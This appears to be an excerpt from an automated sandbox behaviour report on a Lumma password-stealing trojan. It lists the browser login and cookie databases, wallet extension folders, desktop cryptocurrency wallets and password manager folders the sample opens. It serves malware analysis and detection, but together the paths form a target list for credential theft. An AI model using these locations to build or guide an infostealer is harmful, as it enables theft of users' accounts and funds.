Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior

Tries to steal from password manager

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\1Password	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Bitwarden	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
